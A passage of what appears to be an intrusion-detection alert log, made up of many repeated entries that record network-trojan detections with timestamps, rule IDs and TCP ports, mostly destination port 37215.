              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308164
              SID:2829579
              Source Port:40160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834961
              SID:2835222
              Source Port:42124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936656
              SID:2829579
              Source Port:42962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694078
              SID:2835222
              Source Port:40314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357343
              SID:2835222
              Source Port:37922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212771
              SID:2829579
              Source Port:59326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199515
              SID:2829579
              Source Port:54074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450891
              SID:2835222
              Source Port:43634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111471
              SID:2835222
              Source Port:58500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156047
              SID:2835222
              Source Port:50286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992194
              SID:2835222
              Source Port:41446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176037
              SID:2829579
              Source Port:51014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:16.011815
              SID:2840515
              Source Port:48720
              Destination Port:4554
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197408
              SID:2829579
              Source Port:51862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060727
              SID:2829579
              Source Port:60062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729470
              SID:2835222
              Source Port:38654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095725
              SID:2829579
              Source Port:35932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973515
              SID:2835222
              Source Port:48086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349980
              SID:2835222
              Source Port:36216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348501
              SID:2829579
              Source Port:48026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257045
              SID:2829579
              Source Port:50160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170411
              SID:2835222
              Source Port:46190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488903
              SID:2835222
              Source Port:47016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300249
              SID:2835222
              Source Port:59902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753286
              SID:2835222
              Source Port:40808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524341
              SID:2829579
              Source Port:48372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237807
              SID:2835222
              Source Port:50798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456989
              SID:2835222
              Source Port:49108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106427
              SID:2829579
              Source Port:34666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978833
              SID:2829579
              Source Port:41288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510312
              SID:2835222
              Source Port:49758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212547
              SID:2835222
              Source Port:41774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130958
              SID:2829579
              Source Port:55280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993013
              SID:2829579
              Source Port:51468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409536
              SID:2835222
              Source Port:49828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055536
              SID:2835222
              Source Port:44386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832249
              SID:2829579
              Source Port:55922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127191
              SID:2835222
              Source Port:39628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.247953
              SID:2829579
              Source Port:47022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128296
              SID:2835222
              Source Port:51146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835871
              SID:2835222
              Source Port:38924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656981
              SID:2829579
              Source Port:52798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554877
              SID:2829579
              Source Port:33602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229304
              SID:2835222
              Source Port:37914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106689
              SID:2829579
              Source Port:50926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154081
              SID:2835222
              Source Port:39504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229708
              SID:2835222
              Source Port:53780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992959
              SID:2829579
              Source Port:50942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784767
              SID:2835222
              Source Port:59370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510217
              SID:2835222
              Source Port:45586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510243
              SID:2829579
              Source Port:46532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158781
              SID:2835222
              Source Port:38742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077558
              SID:2835222
              Source Port:56402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458627
              SID:2835222
              Source Port:36866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480310
              SID:2829579
              Source Port:40098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107755
              SID:2829579
              Source Port:52250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670530
              SID:2829579
              Source Port:35374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042982
              SID:2829579
              Source Port:51812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439401
              SID:2829579
              Source Port:35182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567110
              SID:2835222
              Source Port:53758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174527
              SID:2829579
              Source Port:58158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568044
              SID:2829579
              Source Port:42166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247885
              SID:2835222
              Source Port:46424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632692
              SID:2835222
              Source Port:45200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262733
              SID:2835222
              Source Port:60664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507741
              SID:2835222
              Source Port:58860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884403
              SID:2829579
              Source Port:48264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229748
              SID:2829579
              Source Port:49556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676382
              SID:2835222
              Source Port:56236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278013
              SID:2835222
              Source Port:45212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670665
              SID:2835222
              Source Port:55610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077513
              SID:2835222
              Source Port:53246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371972
              SID:2835222
              Source Port:52582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219956
              SID:2835222
              Source Port:60648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416217
              SID:2829579
              Source Port:56182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509997
              SID:2835222
              Source Port:53530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710949
              SID:2835222
              Source Port:37876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726684
              SID:2835222
              Source Port:37238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409036
              SID:2829579
              Source Port:40962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106658
              SID:2835222
              Source Port:41728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107444
              SID:2829579
              Source Port:38052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824305
              SID:2829579
              Source Port:36642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885014
              SID:2829579
              Source Port:39308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501645
              SID:2829579
              Source Port:53368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711060
              SID:2829579
              Source Port:59170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307261
              SID:2829579
              Source Port:46278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727419
              SID:2829579
              Source Port:36612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299151
              SID:2835222
              Source Port:51138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456745
              SID:2835222
              Source Port:45296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099140
              SID:2835222
              Source Port:53800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572924
              SID:2835222
              Source Port:59282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026696
              SID:2835222
              Source Port:35446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027894
              SID:2829579
              Source Port:43344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129876
              SID:2829579
              Source Port:55078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617831
              SID:2835222
              Source Port:51226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454640
              SID:2835222
              Source Port:34528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107155
              SID:2835222
              Source Port:51842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547196
              SID:2835222
              Source Port:38868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545809
              SID:2829579
              Source Port:43836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728783
              SID:2835222
              Source Port:41626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655263
              SID:2829579
              Source Port:36052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474209
              SID:2835222
              Source Port:40070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123453
              SID:2835222
              Source Port:53974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304315
              SID:2835222
              Source Port:46648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106553
              SID:2829579
              Source Port:37626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803137
              SID:2835222
              Source Port:56400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301690
              SID:2835222
              Source Port:49344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438778
              SID:2835222
              Source Port:33480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694419
              SID:2829579
              Source Port:58590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275113
              SID:2835222
              Source Port:40884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.934532
              SID:2829579
              Source Port:37240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039168
              SID:2835222
              Source Port:42844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095756
              SID:2835222
              Source Port:39132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993634
              SID:2835222
              Source Port:48380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303950
              SID:2835222
              Source Port:53586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150521
              SID:2829579
              Source Port:35534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402677
              SID:2835222
              Source Port:59332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554414
              SID:2829579
              Source Port:47110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991738
              SID:2835222
              Source Port:59672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707307
              SID:2835222
              Source Port:42912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486866
              SID:2835222
              Source Port:54052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612008
              SID:2829579
              Source Port:37440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152923
              SID:2829579
              Source Port:41498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424082
              SID:2829579
              Source Port:35958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607494
              SID:2835222
              Source Port:54760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377344
              SID:2829579
              Source Port:53366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480438
              SID:2835222
              Source Port:41206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975780
              SID:2835222
              Source Port:52970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454943
              SID:2829579
              Source Port:35284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304049
              SID:2829579
              Source Port:37470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971231
              SID:2829579
              Source Port:56434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869817
              SID:2829579
              Source Port:38718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784309
              SID:2835222
              Source Port:41268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026985
              SID:2835222
              Source Port:33086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040813
              SID:2829579
              Source Port:34422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839153
              SID:2835222
              Source Port:49254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887209
              SID:2829579
              Source Port:38606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486941
              SID:2835222
              Source Port:49872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039000
              SID:2829579
              Source Port:54524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055510
              SID:2835222
              Source Port:56238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191377
              SID:2829579
              Source Port:38456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111834
              SID:2829579
              Source Port:56034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911342
              SID:2829579
              Source Port:38928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247429
              SID:2829579
              Source Port:52494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485089
              SID:2829579
              Source Port:42150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216927
              SID:2829579
              Source Port:51018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086660
              SID:2835222
              Source Port:49956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027740
              SID:2835222
              Source Port:45676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423672
              SID:2829579
              Source Port:53332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358915
              SID:2835222
              Source Port:34360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416142
              SID:2829579
              Source Port:55184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254153
              SID:2829579
              Source Port:59810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044815
              SID:2829579
              Source Port:37540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709870
              SID:2835222
              Source Port:47456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710210
              SID:2829579
              Source Port:35436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058705
              SID:2835222
              Source Port:57844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969166
              SID:2835222
              Source Port:51244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301456
              SID:2829579
              Source Port:60190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940748
              SID:2829579
              Source Port:49288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248767
              SID:2835222
              Source Port:59374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990859
              SID:2835222
              Source Port:48774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094004
              SID:2835222
              Source Port:33100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888691
              SID:2829579
              Source Port:41530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275771
              SID:2829579
              Source Port:53164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.304143
              SID:2835222
              Source Port:42262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257881
              SID:2829579
              Source Port:56266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485484
              SID:2829579
              Source Port:48174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042671
              SID:2829579
              Source Port:54132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.251639
              SID:2829579
              Source Port:47434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274412
              SID:2829579
              Source Port:54888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419930
              SID:2829579
              Source Port:36352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356984
              SID:2835222
              Source Port:36090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403936
              SID:2835222
              Source Port:42504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043149
              SID:2835222
              Source Port:39310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726268
              SID:2829579
              Source Port:54104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210302
              SID:2829579
              Source Port:56900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370631
              SID:2829579
              Source Port:57746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276889
              SID:2835222
              Source Port:34810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992682
              SID:2835222
              Source Port:54196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488877
              SID:2835222
              Source Port:36124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993909
              SID:2829579
              Source Port:42628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263448
              SID:2835222
              Source Port:48222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359373
              SID:2835222
              Source Port:49014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048423
              SID:2829579
              Source Port:58038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079300
              SID:2835222
              Source Port:59220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098937
              SID:2829579
              Source Port:51340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450610
              SID:2829579
              Source Port:58714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214421
              SID:2835222
              Source Port:56402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128048
              SID:2835222
              Source Port:52352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419327
              SID:2829579
              Source Port:60658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355774
              SID:2829579
              Source Port:55126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416124
              SID:2829579
              Source Port:58366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659682
              SID:2835222
              Source Port:45544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659903
              SID:2835222
              Source Port:43878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127049
              SID:2835222
              Source Port:44004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729634
              SID:2835222
              Source Port:35888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.296232
              SID:2835222
              Source Port:44934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
